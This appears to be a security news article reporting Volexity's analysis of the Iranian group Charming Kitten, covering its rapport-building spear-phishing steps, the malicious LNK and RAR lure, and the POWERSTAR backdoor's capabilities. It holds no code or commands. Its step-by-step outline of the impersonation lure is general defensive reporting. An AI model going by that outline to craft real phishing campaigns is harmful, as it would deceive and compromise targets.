Charming Kitten, an Iranian-based threat actor, has been identified by security researchers at Volexity as using innovative spear-phishing methods to compromise the credentials and systems of their targets. The group’s main focus is gathering intelligence through compromised credentials and spear-phishing emails.
In a recent spear-phishing campaign, Charming Kitten was found to be distributing an updated version of the backdoor, known as POWERSTAR or CharmPower. Volexity analysts were able to analyze the new variant and discovered that it employed interesting features such as IPFS and publicly accessible cloud hosting for decryption and configuration details.
The timeline of the POWERSTAR backdoor revealed that Charming Kitten had focused on a recent attack target, posing as an Israeli media reporter. The attacker engaged in casual conversation with the target before offering a document on US foreign policy. This technique of building rapport and trust with the target is a common tactic used by spear-phishing actors. After several days of legitimate communication, Charming Kitten sent a malicious LNK file disguised as a “draft report” along with a password-protected RAR file.
To carry out their spear-phishing campaigns, Charming Kitten follows a series of phishing operations. They first pose as a genuine person with a verifiable public profile and initiate contact with the target. The sender’s email imitates the impersonated person’s personal account to avoid raising any recipient concerns. Once the target responds, Charming Kitten sends a follow-up email with a series of questions to strengthen the attacker-victim rapport. If the target remains unresponsive or responds positively, a malicious password-protected attachment is sent.
The POWERSTAR backdoor used by Charming Kitten has several features that allow for remote execution of PowerShell and CSharp commands, persistence via startup tasks and registry run keys, and dynamically updating configuration settings. It also has multiple command and control (C2) channels, including cloud file hosts, attacker-controlled servers, and IPFS-hosted files. The backdoor collects system reconnaissance information and can monitor previously established persistence mechanisms.
Volexity researchers successfully obtained access to nine modules of the POWERSTAR backdoor. These modules include functionality such as taking screenshots, enumerating running processes, establishing persistence, checking system information, crawling files, and performing cleanup operations. Charming Kitten has continuously enhanced the malware to increase its detection complexity, such as downloading the decryption function from remote files to make it harder to detect except in memory.
To protect against such spear-phishing attacks, implementing AI-powered email security solutions can provide businesses with the necessary tools to detect and block dangerous email threats. These solutions can help prevent email tracking, blocking, modifying, phishing, account takeovers, business email compromise, and malware and ransomware attacks.
In conclusion, Charming Kitten, an Iranian-based threat actor, has been using innovative spear-phishing methods to compromise the credentials and systems of their targets. Their recent campaign involved distributing an updated version of the POWERSTAR backdoor. By understanding the techniques and features employed by threat actors like Charming Kitten, organizations can better defend against spear-phishing attacks and protect their sensitive information. Implementing advanced email security solutions can provide an added layer of protection against these evolving threats.